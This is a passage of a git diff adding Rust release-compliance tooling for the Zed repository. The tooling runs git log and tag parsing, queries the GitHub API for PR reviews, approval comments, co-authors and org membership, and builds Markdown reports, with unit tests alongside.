reporter.check_commit(&self.commit).await + } + } + + #[tokio::test] + async fn approved_review_by_org_member_succeeds() { + let result = TestScenario::single_commit() + .with_reviews(vec![review("bob", ReviewState::Approved)]) + .with_org_members(vec!["bob"]) + .run_scenario() + .await; + assert!(matches!(result, Ok(ReviewSuccess::PullRequestReviewed(_)))); + } + + #[tokio::test] + async fn non_approved_review_state_is_not_accepted() { + let result = TestScenario::single_commit() + .with_reviews(vec![review("bob", ReviewState::Other)]) + .with_org_members(vec!["bob"]) + .run_scenario() + .await; + assert!(matches!(result, Err(ReviewFailure::Unreviewed))); + } + + #[tokio::test] + async fn review_by_non_org_member_is_not_accepted() { + let result = TestScenario::single_commit() + .with_reviews(vec![review("bob", ReviewState::Approved)]) + .run_scenario() + .await; + assert!(matches!(result, Err(ReviewFailure::Unreviewed))); + } + + #[tokio::test] + async fn pr_author_own_approval_review_is_rejected() { + let result = TestScenario::single_commit() + .with_reviews(vec![review("alice", ReviewState::Approved)]) + .with_org_members(vec!["alice"]) + .run_scenario() + .await; + assert!(matches!(result, Err(ReviewFailure::Unreviewed))); + } + + #[tokio::test] + async fn pr_author_own_approval_comment_is_rejected() { + let result = TestScenario::single_commit() + .with_comments(vec![comment("alice", "@zed-zippy approve")]) + .with_org_members(vec!["alice"]) + .run_scenario() + .await; + assert!(matches!(result, Err(ReviewFailure::Unreviewed))); + } + + #[tokio::test] + async fn approval_comment_by_org_member_succeeds() { + let result = TestScenario::single_commit() + .with_comments(vec![comment("bob", "@zed-zippy approve")]) + .with_org_members(vec!["bob"]) + .run_scenario() + .await; + assert!(matches!(result, Ok(ReviewSuccess::ApprovingComment(_)))); + } + + #[tokio::test] + async fn group_approval_comment_by_org_member_succeeds() { + let result = TestScenario::single_commit() + .with_comments(vec![comment("bob", "@zed-industries/approved")]) + .with_org_members(vec!["bob"]) + .run_scenario() + .await; + assert!(matches!(result, Ok(ReviewSuccess::ApprovingComment(_)))); + } + + #[tokio::test] + async fn comment_without_approval_pattern_is_not_accepted() { + let result = TestScenario::single_commit() + .with_comments(vec![comment("bob", "looks good")]) + .with_org_members(vec!["bob"]) + .run_scenario() + .await; + assert!(matches!(result, Err(ReviewFailure::Unreviewed))); + } + + #[tokio::test] + async fn commit_without_pr_number_is_no_pr_found() { + let result = TestScenario::single_commit() + .with_commit(make_commit( + "abc12345abc12345", + "Alice", + "alice@test.com", + "Fix thing without PR number", + "", + )) + .run_scenario() + .await; + assert!(matches!(result, Err(ReviewFailure::NoPullRequestFound))); + } + + #[tokio::test] + async fn pr_review_takes_precedence_over_comment() { + let result = TestScenario::single_commit() + .with_reviews(vec![review("bob", ReviewState::Approved)]) + .with_comments(vec![comment("charlie", "@zed-zippy approve")]) + .with_org_members(vec!["bob", "charlie"]) + .run_scenario() + .await; + assert!(matches!(result, Ok(ReviewSuccess::PullRequestReviewed(_)))); + } + + #[tokio::test] + async fn comment_takes_precedence_over_co_author() { + let result = TestScenario::single_commit() + .with_comments(vec![comment("bob", "@zed-zippy approve")]) + .with_commit_authors_json(serde_json::json!({ + "abc12345abc12345": { + "author": { + "name": "Alice", + "email": "alice@test.com", + "user": { "login": "alice" } + }, + "authors": [{ + "name": "Charlie", + "email": "charlie@test.com", + "user": { "login": "charlie" } + }] + } + })) + .with_commit(make_commit( + "abc12345abc12345", + "Alice", + "alice@test.com", + "Fix thing (#1234)", + "Co-authored-by: Charlie ", + )) + .with_org_members(vec!["bob", "charlie"]) + .run_scenario() + .await; + assert!(matches!(result, Ok(ReviewSuccess::ApprovingComment(_)))); + } + + #[tokio::test] + async fn co_author_org_member_succeeds() { + let result = TestScenario::single_commit() + .with_commit_authors_json(serde_json::json!({ + "abc12345abc12345": { + "author": { + "name": "Alice", + "email": "alice@test.com", + "user": { "login": "alice" } + }, + "authors": [{ + "name": "Bob", + "email": "bob@test.com", + "user": { "login": "bob" } + }] + } + })) + .with_commit(make_commit( + "abc12345abc12345", + "Alice", + "alice@test.com", + "Fix thing (#1234)", + "Co-authored-by: Bob ", + )) + .with_org_members(vec!["bob"]) + .run_scenario() + .await; + assert!(matches!(result, Ok(ReviewSuccess::CoAuthored(_)))); + } + + #[tokio::test] + async fn no_reviews_no_comments_no_coauthors_is_unreviewed() { + let result = TestScenario::single_commit().run_scenario().await; + assert!(matches!(result, Err(ReviewFailure::Unreviewed))); + } +} diff --git a/tooling/compliance/src/git.rs b/tooling/compliance/src/git.rs new file mode 100644 index 0000000000000000000000000000000000000000..fa2cb725712de82526d4ce717c2ec3dc97d22885 --- /dev/null +++ b/tooling/compliance/src/git.rs @@ -0,0 +1,591 @@ +#![allow(clippy::disallowed_methods, reason = "This is only used in xtasks")] +use std::{ + fmt::{self, Debug}, + ops::Not, + process::Command, + str::FromStr, + sync::LazyLock, +}; + +use anyhow::{Context, Result, anyhow}; +use derive_more::{Deref, DerefMut, FromStr}; + +use itertools::Itertools; +use regex::Regex; +use semver::Version; +use serde::Deserialize; + +pub trait Subcommand { + type ParsedOutput: FromStr; + + fn args(&self) -> impl IntoIterator; +} + +#[derive(Deref, DerefMut)] +pub struct GitCommand { + #[deref] + #[deref_mut] + subcommand: G, +} + +impl GitCommand { + #[must_use] + pub fn run(subcommand: G) -> Result { + Self { subcommand }.run_impl() + } + + fn run_impl(self) -> Result { + let command_output = Command::new("git") + .args(self.subcommand.args()) + .output() + .context("Failed to spawn command")?; + + if command_output.status.success() { + String::from_utf8(command_output.stdout) + .map_err(|_| anyhow!("Invalid UTF8")) + .and_then(|s| { + G::ParsedOutput::from_str(s.trim()) + .map_err(|e| anyhow!("Failed to parse from string: {e:?}")) + }) + } else { + anyhow::bail!( + "Command failed with exit code {}, stderr: {}", + command_output.status.code().unwrap_or_default(), + String::from_utf8(command_output.stderr).unwrap_or_default() + ) + } + } +} + +#[derive(Copy, Clone, Debug, PartialEq, Eq, PartialOrd, Ord)] +pub enum ReleaseChannel { + Stable, + Preview, +} + +impl ReleaseChannel { + pub(crate) fn tag_suffix(&self) -> &'static str { + match self { + ReleaseChannel::Stable => "", + ReleaseChannel::Preview => "-pre", + } + } +} + +#[derive(Debug, Clone)] +pub struct VersionTag(Version, ReleaseChannel); + +impl VersionTag { + pub fn parse(input: &str) -> Result { + // Being a bit more lenient for human inputs + let version = input.strip_prefix('v').unwrap_or(input); + + let (version_str, channel) = version + .strip_suffix("-pre") + .map_or((version, ReleaseChannel::Stable), |version_str| { + (version_str, ReleaseChannel::Preview) + }); + + Version::parse(version_str) + .map(|version| Self(version, channel)) + .map_err(|_| anyhow::anyhow!("Failed to parse version from tag!")) + } + + pub fn version(&self) -> &Version { + &self.0 + } +} + +impl ToString for VersionTag { + fn to_string(&self) -> String { + format!( + "v{version}{channel_suffix}", + version = self.0, + channel_suffix = self.1.tag_suffix() + ) + } +} + +#[derive(Debug, Deref, FromStr, PartialEq, Eq, Hash, Deserialize)] +pub struct CommitSha(pub(crate) String); + +impl CommitSha { + pub fn short(&self) -> &str { + self.0.as_str().split_at(8).0 + } +} + +#[derive(Debug)] +pub struct CommitDetails { + sha: CommitSha, + author: Committer, + title: String, + body: String, +} + +#[derive(Debug, Clone, PartialEq, Eq)] +pub struct Committer { + name: String, + email: String, +} + +impl Committer { + pub fn new(name: &str, email: &str) -> Self { + Self { + name: name.to_owned(), + email: email.to_owned(), + } + } +} + +impl fmt::Display for Committer { + fn fmt(&self, formatter: &mut fmt::Formatter<'_>) -> fmt::Result { + write!(formatter, "{} ({})", self.name, self.email) + } +} + +impl CommitDetails { + const BODY_DELIMITER: &str = "|body-delimiter|"; + const COMMIT_DELIMITER: &str = "|commit-delimiter|"; + const FIELD_DELIMITER: &str = "|field-delimiter|"; + const FORMAT_STRING: &str = "%H|field-delimiter|%an|field-delimiter|%ae|field-delimiter|%s|body-delimiter|%b|commit-delimiter|"; + + fn parse(line: &str, body: &str) -> Result { + let Some([sha, author_name, author_email, title]) = + line.splitn(4, Self::FIELD_DELIMITER).collect_array() + else { + return Err(anyhow!("Failed to parse commit fields from input {line}")); + }; + + Ok(CommitDetails { + sha: CommitSha(sha.to_owned()), + author: Committer::new(author_name, author_email), + title: title.to_owned(), + body: body.to_owned(), + }) + } + + pub fn pr_number(&self) -> Option { + // Since we use squash merge, all commit titles end with the '(#12345)' pattern. + // While we could strictly speaking index into this directly, go for a slightly + // less prone approach to errors + const PATTERN: &str = " (#"; + self.title + .rfind(PATTERN) + .and_then(|location| { + self.title[location..] + .find(')') + .map(|relative_end| location + PATTERN.len()..location + relative_end) + }) + .and_then(|range| self.title[range].parse().ok()) + } + + pub(crate) fn co_authors(&self) -> Option> { + static CO_AUTHOR_REGEX: LazyLock = + LazyLock::new(|| Regex::new(r"Co-authored-by: (.+) <(.+)>").unwrap()); + + let mut co_authors = Vec::new(); + + for cap in CO_AUTHOR_REGEX.captures_iter(&self.body.as_ref()) { + let Some((name, email)) = cap + .get(1) + .map(|m| m.as_str()) + .zip(cap.get(2).map(|m| m.as_str())) + else { + continue; + }; + co_authors.push(Committer::new(name, email)); + } + + co_authors.is_empty().not().then_some(co_authors) + } + + pub(crate) fn author(&self) -> &Committer { + &self.author + } + + pub(crate) fn title(&self) -> &str { + &self.title + } + + pub(crate) fn sha(&self) -> &CommitSha { + &self.sha + } +} + +#[derive(Debug, Deref, Default, DerefMut)] +pub struct CommitList(Vec); + +impl CommitList { + pub fn range(&self) -> Option { + self.0 + .first() + .zip(self.0.last()) + .map(|(first, last)| format!("{}..{}", first.sha().0, last.sha().0)) + } +} + +impl IntoIterator for CommitList { + type IntoIter = std::vec::IntoIter; + type Item = CommitDetails; + + fn into_iter(self) -> std::vec::IntoIter { + self.0.into_iter() + } +} + +impl FromStr for CommitList { + type Err = anyhow::Error; + + fn from_str(input: &str) -> Result { + Ok(CommitList( + input + .split(CommitDetails::COMMIT_DELIMITER) + .filter(|commit_details| !commit_details.is_empty()) + .map(|commit_details| { + let (line, body) = commit_details + .trim() + .split_once(CommitDetails::BODY_DELIMITER) + .expect("Missing body delimiter"); + CommitDetails::parse(line, body) + .expect("Parsing from the output should succeed") + }) + .collect(), + )) + } +} + +pub struct GetVersionTags; + +impl Subcommand for GetVersionTags { + type ParsedOutput = VersionTagList; + + fn args(&self) -> impl IntoIterator { + ["tag", "-l", "v*"].map(ToOwned::to_owned) + } +} + +pub struct VersionTagList(Vec); + +impl VersionTagList { + pub fn sorted(mut self) -> Self { + self.0.sort_by(|a, b| a.version().cmp(b.version())); + self + } + + pub fn find_previous_minor_version(&self, version_tag: &VersionTag) -> Option<&VersionTag> { + self.0 + .iter() + .take_while(|tag| tag.version() < version_tag.version()) + .collect_vec() + .into_iter() + .rev() + .find(|tag| { + (tag.version().major < version_tag.version().major + || (tag.version().major == version_tag.version().major + && tag.version().minor < version_tag.version().minor)) + && tag.version().patch == 0 + }) + } +} + +impl FromStr for VersionTagList { + type Err = anyhow::Error; + + fn from_str(s: &str) -> Result { + let version_tags = s.lines().flat_map(VersionTag::parse).collect_vec(); + + version_tags + .is_empty() + .not() + .then_some(Self(version_tags)) + .ok_or_else(|| anyhow::anyhow!("No version tags found")) + } +} + +pub struct CommitsFromVersionToHead { + version_tag: VersionTag, + branch: String, +} + +impl CommitsFromVersionToHead { + pub fn new(version_tag: VersionTag, branch: String) -> Self { + Self { + version_tag, + branch, + } + } +} + +impl Subcommand for CommitsFromVersionToHead { + type ParsedOutput = CommitList; + + fn args(&self) -> impl IntoIterator { + [ + "log".to_string(), + format!("--pretty=format:{}", CommitDetails::FORMAT_STRING), + format!( + "{version}..{branch}", + version = self.version_tag.to_string(), + branch = self.branch + ), + ] + } +} + +pub struct NoOutput; + +impl FromStr for NoOutput { + type Err = anyhow::Error; + + fn from_str(_: &str) -> Result { + Ok(NoOutput) + } +} + +#[cfg(test)] +mod tests { + use super::*; + use indoc::indoc; + + #[test] + fn parse_stable_version_tag() { + let tag = VersionTag::parse("v0.172.8").unwrap(); + assert_eq!(tag.version().major, 0); + assert_eq!(tag.version().minor, 172); + assert_eq!(tag.version().patch, 8); + assert_eq!(tag.1, ReleaseChannel::Stable); + } + + #[test] + fn parse_preview_version_tag() { + let tag = VersionTag::parse("v0.172.1-pre").unwrap(); + assert_eq!(tag.version().major, 0); + assert_eq!(tag.version().minor, 172); + assert_eq!(tag.version().patch, 1); + assert_eq!(tag.1, ReleaseChannel::Preview); + } + + #[test] + fn parse_version_tag_without_v_prefix() { + let tag = VersionTag::parse("0.172.8").unwrap(); + assert_eq!(tag.version().major, 0); + assert_eq!(tag.version().minor, 172); + assert_eq!(tag.version().patch, 8); + } + + #[test] + fn parse_invalid_version_tag() { + let result = VersionTag::parse("vConradTest"); + assert!(result.is_err()); + } + + #[test] + fn version_tag_stable_roundtrip() { + let tag = VersionTag::parse("v0.172.8").unwrap(); + assert_eq!(tag.to_string(), "v0.172.8"); + } + + #[test] + fn version_tag_preview_roundtrip() { + let tag = VersionTag::parse("v0.172.1-pre").unwrap(); + assert_eq!(tag.to_string(), "v0.172.1-pre"); + } + + #[test] + fn sorted_orders_by_semver() { + let input = indoc! {" + v0.172.8 + v0.170.1 + v0.171.4 + v0.170.2 + v0.172.11 + v0.171.3 + v0.172.9 + "}; + let list = VersionTagList::from_str(input).unwrap().sorted(); + for window in list.0.windows(2) { + assert!( + window[0].version() <= window[1].version(), + "{} should come before {}", + window[0].to_string(), + window[1].to_string() + ); + } + assert_eq!(list.0[0].to_string(), "v0.170.1"); + assert_eq!(list.0[list.0.len() - 1].to_string(), "v0.172.11"); + } + + #[test] + fn find_previous_minor_for_173_returns_172() { + let input = indoc! {" + v0.170.1 + v0.170.2 + v0.171.3 + v0.171.4 + v0.172.0 + v0.172.8 + v0.172.9 + v0.172.11 + "}; + let list = VersionTagList::from_str(input).unwrap().sorted(); + let target = VersionTag::parse("v0.173.0").unwrap(); + let previous = list.find_previous_minor_version(&target).unwrap(); + assert_eq!(previous.version().major, 0); + assert_eq!(previous.version().minor, 172); + assert_eq!(previous.version().patch, 0); + } + + #[test] + fn find_previous_minor_skips_same_minor() { + let input = indoc! {" + v0.172.8 + v0.172.9 + v0.172.11 + "}; + let list = VersionTagList::from_str(input).unwrap().sorted(); + let target = VersionTag::parse("v0.172.8").unwrap(); + assert!(list.find_previous_minor_version(&target).is_none()); + } + + #[test] + fn find_previous_minor_with_major_version_gap() { + let input = indoc! {" + v0.172.0 + v0.172.9 + v0.172.11 + "}; + let list = VersionTagList::from_str(input).unwrap().sorted(); + let target = VersionTag::parse("v1.0.0").unwrap(); + let previous = list.find_previous_minor_version(&target).unwrap(); + assert_eq!(previous.to_string(), "v0.172.0"); + } + + #[test] + fn find_previous_minor_requires_zero_patch_version() { + let input = indoc! {" + v0.172.1 + v0.172.9 + v0.172.11 + "}; + let list = VersionTagList::from_str(input).unwrap().sorted(); + let target = VersionTag::parse("v1.0.0").unwrap(); + assert!(list.find_previous_minor_version(&target).is_none()); + } + + #[test] + fn parse_tag_list_from_real_tags() { + let input = indoc! {" + v0.9999-temporary + vConradTest + v0.172.8 + "}; + let list = VersionTagList::from_str(input).unwrap(); + assert_eq!(list.0.len(), 1); + assert_eq!(list.0[0].to_string(), "v0.172.8"); + } + + #[test] + fn parse_empty_tag_list_fails() { + let result = VersionTagList::from_str(""); + assert!(result.is_err()); + } + + #[test] + fn pr_number_from_squash_merge_title() { + let line = format!( + "abc123{d}Author Name{d}author@email.com{d}Add cool feature (#12345)", + d = CommitDetails::FIELD_DELIMITER + ); + let commit = CommitDetails::parse(&line, "").unwrap(); + assert_eq!(commit.pr_number(), Some(12345)); + } + + #[test] + fn pr_number_missing() { + let line = format!( + "abc123{d}Author Name{d}author@email.com{d}Some commit without PR ref", + d = CommitDetails::FIELD_DELIMITER + ); + let commit = CommitDetails::parse(&line, "").unwrap(); + assert_eq!(commit.pr_number(), None); + } + + #[test] + fn pr_number_takes_last_match() { + let line = format!( + "abc123{d}Author Name{d}author@email.com{d}Fix (#123) and refactor (#456)", + d = CommitDetails::FIELD_DELIMITER + ); + let commit = CommitDetails::parse(&line, "").unwrap(); + assert_eq!(commit.pr_number(), Some(456)); + } + + #[test] + fn co_authors_parsed_from_body() { + let line = format!( + "abc123{d}Author Name{d}author@email.com{d}Some title", + d = CommitDetails::FIELD_DELIMITER + ); + let body = indoc! {" + Co-authored-by: Alice Smith + Co-authored-by: Bob Jones + "}; + let commit = CommitDetails::parse(&line, body).unwrap(); + let co_authors = commit.co_authors().unwrap(); + assert_eq!(co_authors.len(), 2); + assert_eq!( + co_authors[0], + Committer::new("Alice Smith", "alice@example.com") + ); + assert_eq!( + co_authors[1], + Committer::new("Bob Jones", "bob@example.com") + ); + } + + #[test] + fn no_co_authors_returns_none() { + let line = format!( + "abc123{d}Author Name{d}author@email.com{d}Some title", + d = CommitDetails::FIELD_DELIMITER + ); + let commit = CommitDetails::parse(&line, "").unwrap(); + assert!(commit.co_authors().is_none()); + } + + #[test] + fn commit_sha_short_returns_first_8_chars() { + let sha = CommitSha("abcdef1234567890abcdef1234567890abcdef12".into()); + assert_eq!(sha.short(), "abcdef12"); + } + + #[test] + fn parse_commit_list_from_git_log_format() { + let fd = CommitDetails::FIELD_DELIMITER; + let bd = CommitDetails::BODY_DELIMITER; + let cd = CommitDetails::COMMIT_DELIMITER; + + let input = format!( + "sha111{fd}Alice{fd}alice@test.com{fd}First commit (#100){bd}First body{cd}sha222{fd}Bob{fd}bob@test.com{fd}Second commit (#200){bd}Second body{cd}" + ); + + let list = CommitList::from_str(&input).unwrap(); + assert_eq!(list.0.len(), 2); + + assert_eq!(list.0[0].sha().0, "sha111"); + assert_eq!( + list.0[0].author(), + &Committer::new("Alice", "alice@test.com") + ); + assert_eq!(list.0[0].title(), "First commit (#100)"); + assert_eq!(list.0[0].pr_number(), Some(100)); + assert_eq!(list.0[0].body, "First body"); + + assert_eq!(list.0[1].sha().0, "sha222"); + assert_eq!(list.0[1].author(), &Committer::new("Bob", "bob@test.com")); + assert_eq!(list.0[1].title(), "Second commit (#200)"); + assert_eq!(list.0[1].pr_number(), Some(200)); + assert_eq!(list.0[1].body, "Second body"); + } +} diff --git a/tooling/compliance/src/github.rs b/tooling/compliance/src/github.rs new file mode 100644 index 0000000000000000000000000000000000000000..ebd2f2c75f5d0083632a8f70e3ea9dd2680d4eb5 --- /dev/null +++ b/tooling/compliance/src/github.rs @@ -0,0 +1,424 @@ +use std::{collections::HashMap, fmt, ops::Not, rc::Rc}; + +use anyhow::Result; +use derive_more::Deref; +use serde::Deserialize; + +use crate::git::CommitSha; + +pub const PR_REVIEW_LABEL: &str = "PR state:needs review"; + +#[derive(Debug, Clone)] +pub struct GitHubUser { + pub login: String, +} + +#[derive(Debug, Clone)] +pub struct PullRequestData { + pub number: u64, + pub user: Option, + pub merged_by: Option, +} + +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub enum ReviewState { + Approved, + Other, +} + +#[derive(Debug, Clone)] +pub struct PullRequestReview { + pub user: Option, + pub state: Option, +} + +#[derive(Debug, Clone)] +pub struct PullRequestComment { + pub user: GitHubUser, + pub body: Option, +} + +#[derive(Debug, Deserialize, Clone, Deref, PartialEq, Eq)] +pub struct GithubLogin { + login: String, +} + +impl GithubLogin { + pub(crate) fn new(login: String) -> Self { + Self { login } + } +} + +impl fmt::Display for GithubLogin { + fn fmt(&self, formatter: &mut fmt::Formatter<'_>) -> fmt::Result { + write!(formatter, "@{}", self.login) + } +} + +#[derive(Debug, Deserialize, Clone)] +pub struct CommitAuthor { + name: String, + email: String, + user: Option, +} + +impl CommitAuthor { + pub(crate) fn user(&self) -> Option<&GithubLogin> { + self.user.as_ref() + } +} + +impl PartialEq for CommitAuthor { + fn eq(&self, other: &Self) -> bool { + self.user.as_ref().zip(other.user.as_ref()).map_or_else( + || self.email == other.email || self.name == other.name, + |(l, r)| l == r, + ) + } +} + +impl fmt::Display for CommitAuthor { + fn fmt(&self, formatter: &mut fmt::Formatter<'_>) -> fmt::Result { + match self.user.as_ref() { + Some(user) => write!(formatter, "{} ({user})", self.name), + None => write!(formatter, "{} ({})", self.name, self.email), + } + } +} + +#[derive(Debug, Deserialize)] +pub struct CommitAuthors { + #[serde(rename = "author")] + primary_author: CommitAuthor, + #[serde(rename = "authors")] + co_authors: Vec, +} + +impl CommitAuthors { + pub fn co_authors(&self) -> Option> { + self.co_authors.is_empty().not().then(|| { + self.co_authors + .iter() + .filter(|co_author| *co_author != &self.primary_author) + }) + } +} + +#[derive(Debug, Deserialize, Deref)] +pub struct AuthorsForCommits(HashMap); + +#[async_trait::async_trait(?Send)] +pub trait GitHubApiClient { + async fn get_pull_request(&self, pr_number: u64) -> Result; + async fn get_pull_request_reviews(&self, pr_number: u64) -> Result>; + async fn get_pull_request_comments(&self, pr_number: u64) -> Result>; + async fn get_commit_authors(&self, commit_shas: &[&CommitSha]) -> Result; + async fn check_org_membership(&self, login: &GithubLogin) -> Result; + async fn ensure_pull_request_has_label(&self, label: &str, pr_number: u64) -> Result<()>; +} + +pub struct GitHubClient { + api: Rc, +} + +impl GitHubClient { + pub fn new(api: Rc) -> Self { + Self { api } + } + + #[cfg(feature = "octo-client")] + pub async fn for_app(app_id: u64, app_private_key: &str) -> Result { + let client = OctocrabClient::new(app_id, app_private_key).await?; + Ok(Self::new(Rc::new(client))) + } + + pub async fn get_pull_request(&self, pr_number: u64) -> Result { + self.api.get_pull_request(pr_number).await + } + + pub async fn get_pull_request_reviews(&self, pr_number: u64) -> Result> { + self.api.get_pull_request_reviews(pr_number).await + } + + pub async fn get_pull_request_comments( + &self, + pr_number: u64, + ) -> Result> { + self.api.get_pull_request_comments(pr_number).await + } + + pub async fn get_commit_authors<'a>( + &self, + commit_shas: impl IntoIterator, + ) -> Result { + let shas: Vec<&CommitSha> = commit_shas.into_iter().collect(); + self.api.get_commit_authors(&shas).await + } + + pub async fn check_org_membership(&self, login: &GithubLogin) -> Result { + self.api.check_org_membership(login).await + } + + pub async fn add_label_to_pull_request(&self, label: &str, pr_number: u64) -> Result<()> { + self.api + .ensure_pull_request_has_label(label, pr_number) + .await + } +} + +#[cfg(feature = "octo-client")] +mod octo_client { + use anyhow::{Context, Result}; + use futures::TryStreamExt as _; + use itertools::Itertools; + use jsonwebtoken::EncodingKey; + use octocrab::{ + Octocrab, Page, models::pulls::ReviewState as OctocrabReviewState, + service::middleware::cache::mem::InMemoryCache, + }; + use serde::de::DeserializeOwned; + use tokio::pin; + + use crate::git::CommitSha; + + use super::{ + AuthorsForCommits, GitHubApiClient, GitHubUser, GithubLogin, PullRequestComment, + PullRequestData, PullRequestReview, ReviewState, + }; + + const PAGE_SIZE: u8 = 100; + const ORG: &str = "zed-industries"; + const REPO: &str = "zed"; + + pub struct OctocrabClient { + client: Octocrab, + } + + impl OctocrabClient { + pub async fn new(app_id: u64, app_private_key: &str) -> Result { + let octocrab = Octocrab::builder() + .cache(InMemoryCache::new()) + .app( + app_id.into(), + EncodingKey::from_rsa_pem(app_private_key.as_bytes())?, + ) + .build()?; + + let installations = octocrab + .apps() + .installations() + .send() + .await + .context("Failed to fetch installations")? + .take_items(); + + let installation_id = installations + .into_iter() + .find(|installation| installation.account.login == ORG) + .context("Could not find Zed repository in installations")? + .id; + + let client = octocrab.installation(installation_id)?; + Ok(Self { client }) + } + + fn build_co_authors_query<'a>(shas: impl IntoIterator) -> String { + const FRAGMENT: &str = r#" + ... on Commit { + author { + name + email + user { login } + } + authors(first: 10) { + nodes { + name + email + user { login } + } + } + } + "#; + + let objects: String = shas + .into_iter() + .map(|commit_sha| { + format!( + "commit{sha}: object(oid: \"{sha}\") {{ {FRAGMENT} }}", + sha = **commit_sha + ) + }) + .join("\n"); + + format!("{{ repository(owner: \"{ORG}\", name: \"{REPO}\") {{ {objects} }} }}") + .replace("\n", "") + } + + async fn graphql( + &self, + query: &serde_json::Value, + ) -> octocrab::Result { + self.client.graphql(query).await + } + + async fn get_all( + &self, + page: Page, + ) -> octocrab::Result> { + self.get_filtered(page, |_| true).await + } + + async fn get_filtered( + &self, + page: Page, + predicate: impl Fn(&T) -> bool, + ) -> octocrab::Result> { + let stream = page.into_stream(&self.client); + pin!(stream); + + let mut results = Vec::new(); + + while let Some(item) = stream.try_next().await? + && predicate(&item) + { + results.push(item); + } + + Ok(results) + } + } + + #[async_trait::async_trait(?Send)] + impl GitHubApiClient for OctocrabClient { + async fn get_pull_request(&self, pr_number: u64) -> Result { + let pr = self.client.pulls(ORG, REPO).get(pr_number).await?; + Ok(PullRequestData { + number: pr.number, + user: pr.user.map(|user| GitHubUser { login: user.login }), + merged_by: pr.merged_by.map(|user| GitHubUser { login: user.login }), + }) + } + + async fn get_pull_request_reviews(&self, pr_number: u64) -> Result> { + let page = self + .client + .pulls(ORG, REPO) + .list_reviews(pr_number) + .per_page(PAGE_SIZE) + .send() + .await?; + + let reviews = self.get_all(page).await?; + + Ok(reviews + .into_iter() + .map(|review| PullRequestReview { + user: review.user.map(|user| GitHubUser { login: user.login }), + state: review.state.map(|state| match state { + OctocrabReviewState::Approved => ReviewState::Approved, + _ => ReviewState::Other, + }), + }) + .collect()) + } + + async fn get_pull_request_comments( + &self, + pr_number: u64, + ) -> Result> { + let page = self + .client + .issues(ORG, REPO) + .list_comments(pr_number) + .per_page(PAGE_SIZE) + .send() + .await?; + + let comments = self.get_all(page).await?; + + Ok(comments + .into_iter() + .map(|comment| PullRequestComment { + user: GitHubUser { + login: comment.user.login, + }, + body: comment.body, + }) + .collect()) + } + + async fn get_commit_authors( + &self, + commit_shas: &[&CommitSha], + ) -> Result { + let query = Self::build_co_authors_query(commit_shas.iter().copied()); + let query = serde_json::json!({ "query": query }); + let mut response = self.graphql::(&query).await?; + + response + .get_mut("data") + .and_then(|data| data.get_mut("repository")) + .and_then(|repo| repo.as_object_mut()) + .ok_or_else(|| anyhow::anyhow!("Unexpected response format!")) + .and_then(|commit_data| { + let mut response_map = serde_json::Map::with_capacity(commit_data.len()); + + for (key, value) in commit_data.iter_mut() { + let key_without_prefix = key.strip_prefix("commit").unwrap_or(key); + if let Some(authors) = value.get_mut("authors") { + if let Some(nodes) = authors.get("nodes") { + *authors = nodes.clone(); + } + } + + response_map.insert(key_without_prefix.to_owned(), value.clone()); + } + + serde_json::from_value(serde_json::Value::Object(response_map)) + .context("Failed to deserialize commit authors") + }) + } + + async fn check_org_membership(&self, login: &GithubLogin) -> Result { + let page = self + .client + .orgs(ORG) + .list_members() + .per_page(PAGE_SIZE) + .send() + .await?; + + let members = self.get_all(page).await?; + + Ok(members + .into_iter() + .any(|member| member.login == login.as_str())) + } + + async fn ensure_pull_request_has_label(&self, label: &str, pr_number: u64) -> Result<()> { + if self + .get_filtered( + self.client + .issues(ORG, REPO) + .list_labels_for_issue(pr_number) + .per_page(PAGE_SIZE) + .send() + .await?, + |pr_label| pr_label.name == label, + ) + .await + .is_ok_and(|l| l.is_empty()) + { + self.client + .issues(ORG, REPO) + .add_labels(pr_number, &[label.to_owned()]) + .await?; + } + + Ok(()) + } + } +} + +#[cfg(feature = "octo-client")] +pub use octo_client::OctocrabClient; diff --git a/tooling/compliance/src/lib.rs b/tooling/compliance/src/lib.rs new file mode 100644 index 0000000000000000000000000000000000000000..9476412c6d6d1f56b1396bf5d700924549c707da --- /dev/null +++ b/tooling/compliance/src/lib.rs @@ -0,0 +1,4 @@ +pub mod checks; +pub mod git; +pub mod github; +pub mod report; diff --git a/tooling/compliance/src/report.rs b/tooling/compliance/src/report.rs new file mode 100644 index 0000000000000000000000000000000000000000..16df145394726b97382884fbdfdc3164c0029786 --- /dev/null +++ b/tooling/compliance/src/report.rs @@ -0,0 +1,446 @@ +use std::{ + fs::{self, File}, + io::{BufWriter, Write}, + path::Path, +}; + +use anyhow::Context as _; +use derive_more::Display; +use itertools::{Either, Itertools}; + +use crate::{ + checks::{ReviewFailure, ReviewResult, ReviewSuccess}, + git::CommitDetails, +}; + +const PULL_REQUEST_BASE_URL: &str = "https://github.com/zed-industries/zed/pull"; + +#[derive(Debug)] +pub struct ReportEntry { + pub commit: CommitDetails, + reason: R, +} + +impl ReportEntry { + fn commit_cell(&self) -> String { + let title = escape_markdown_link_text(self.commit.title()); + + match self.commit.pr_number() { + Some(pr_number) => format!("[{title}]({PULL_REQUEST_BASE_URL}/{pr_number})"), + None => escape_markdown_table_text(self.commit.title()), + } + } + + fn pull_request_cell(&self) -> String { + self.commit + .pr_number() + .map(|pr_number| format!("#{pr_number}")) + .unwrap_or_else(|| "—".to_owned()) + } + + fn author_cell(&self) -> String { + escape_markdown_table_text(&self.commit.author().to_string()) + } + + fn reason_cell(&self) -> String { + escape_markdown_table_text(&self.reason.to_string()) + } +} + +impl ReportEntry { + fn issue_kind(&self) -> IssueKind { + match self.reason { + ReviewFailure::Other(_) => IssueKind::Error, + _ => IssueKind::NotReviewed, + } + } +} + +impl ReportEntry { + fn reviewers_cell(&self) -> String { + match &self.reason.reviewers() { + Ok(reviewers) => escape_markdown_table_text(&reviewers), + Err(_) => "—".to_owned(), + } + } +} + +#[derive(Debug, Default)] +pub struct ReportSummary { + pub pull_requests: usize, + pub reviewed: usize, + pub not_reviewed: usize, + pub errors: usize, +} + +pub enum ReportReviewSummary { + MissingReviews, + MissingReviewsWithErrors, + NoIssuesFound, +} + +impl ReportSummary { + fn from_entries(entries: &[ReportEntry]) -> Self { + Self { + pull_requests: entries + .iter() + .filter_map(|entry| entry.commit.pr_number()) + .unique() + .count(), + reviewed: entries.iter().filter(|entry| entry.reason.is_ok()).count(), + not_reviewed: entries + .iter() + .filter(|entry| { + matches!( + entry.reason, + Err(ReviewFailure::NoPullRequestFound | ReviewFailure::Unreviewed) + ) + }) + .count(), + errors: entries + .iter() + .filter(|entry| matches!(entry.reason, Err(ReviewFailure::Other(_)))) + 